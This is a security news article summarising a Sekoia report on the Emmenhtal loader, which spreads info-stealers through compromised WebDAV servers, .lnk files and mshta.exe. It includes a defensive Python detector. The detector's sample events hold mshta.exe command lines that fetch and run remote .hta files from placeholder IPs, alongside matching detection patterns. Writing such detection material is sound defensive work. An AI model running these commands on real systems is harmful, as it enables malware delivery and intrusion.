Emmenhtal Malware: Exploiting WebDAV for Malicious Payloads
Sekoia has released a report detailing a relatively new malware loader service known as Emmenhtal. The primary feature of this malware lies in its use of compromised WebDAV servers to host the payloads of its clients.
Emmenhtal, also referred to as PeakLight, distributes various types of malware, including info-stealers, across the globe. Since its emergence in December 2023, it has drawn significant attention from cybersecurity experts due to its stealthy approach. The loader operates entirely in memory, which makes detection and analysis exceedingly difficult.
The Sekoia team investigated the infrastructure used to spread Emmenhtal and discovered that the malicious files are hosted on WebDAV servers. WebDAV, an extension of the HTTP protocol, allows file management on web servers, which serves legitimate purposes. However, cybercriminals are increasingly exploiting this technology for their malicious ends. In this scheme, users are redirected to a WebDAV server where malware is downloaded via specially crafted files such as “.lnk” shortcuts.
Particularly noteworthy is the propagation method, which relies on the legitimate Windows system file “mshta.exe,” designed to execute HTML Applications (.hta). Using such a trusted, signed system binary lets attackers bypass security mechanisms and conceal their activity. Sekoia’s analysis revealed more than 100 WebDAV servers involved in distributing malicious files.
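A defender-side check for the chain described above (mshta.exe launched with a WebDAV UNC path or URL as its argument), written here as an added example that is not taken from the Sekoia report; the Sysmon-style event fields and every host, IP and file name in the sample are constructed for illustration.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style fields); not from the report.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" \\198.51.100.10@80\DavWWWRoot\docs\invoice.hta'},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" http://203.0.113.5/page.hta'},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" C:\Program Files\Vendor\setup.hta'},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'cmd.exe /c dir \\fileserver\public'},
]

# Remote locations mshta.exe can be pointed at: a UNC path (including the WebDAV
# client forms \\host@SSL\DavWWWRoot\... and \\host@port\...) or a bare http(s) URL.
REMOTE_TARGET = re.compile(r'(?i)(\\\\[^\\\s"]+(?:@SSL|@\d+)?\\[^\s"]*|https?://[^\s"]+)')
WEBDAV_SYNTAX = re.compile(r"(?i)@SSL\\|@\d+\\|\\DavWWWRoot\\")

def basename(path):
    """Last component of a Windows path, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()

def flag_remote_mshta(events):
    """Return a finding for each mshta.exe start whose argument is a remote (UNC/WebDAV or URL) target."""
    findings = []
    for ev in events:
        if basename(ev.get("Image", "")) != "mshta.exe":
            continue
        # Drop the quoted executable path so only the arguments are inspected.
        args = ev.get("CommandLine", "").split('"', 2)[-1]
        m = REMOTE_TARGET.search(args)
        if not m:
            continue  # local .hta file: not the pattern described in the report
        target = m.group(1)
        findings.append({
            "target": target,
            "webdav_syntax": bool(WEBDAV_SYNTAX.search(target)),
            "parent": basename(ev.get("ParentImage", "")),  # explorer.exe fits a double-clicked .lnk
        })
    return findings

if __name__ == "__main__":
    for finding in flag_remote_mshta(SAMPLE_EVENTS):
        print(finding)
```

The same check can be run over exported EDR or Sysmon telemetry; a parent of explorer.exe combined with a WebDAV-style target is the combination worth alerting on first.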
Additionally, the experts uncovered that various malware families, including SelfAU3, DarkGate, Amadey, and others, are disseminated through this infrastructure. This suggests that the infrastructure is likely offered as a service to other cybercriminals, providing the means to rent servers and tools for hosting and delivering malicious software.
For several months, Emmenhtal’s infrastructure has utilized the same autonomous systems (AS) to host WebDAV servers, indicating a potentially centralized nature to the operation. Among the AS used were companies like Terasyst Ltd and Zonata, suggesting reliable agreements with service providers.
Sekoia’s conclusions point to the likelihood that Emmenhtal’s infrastructure represents a commercial service operated by a cybercriminal group, offering an environment for the hosting and distribution of a wide range of malicious programs.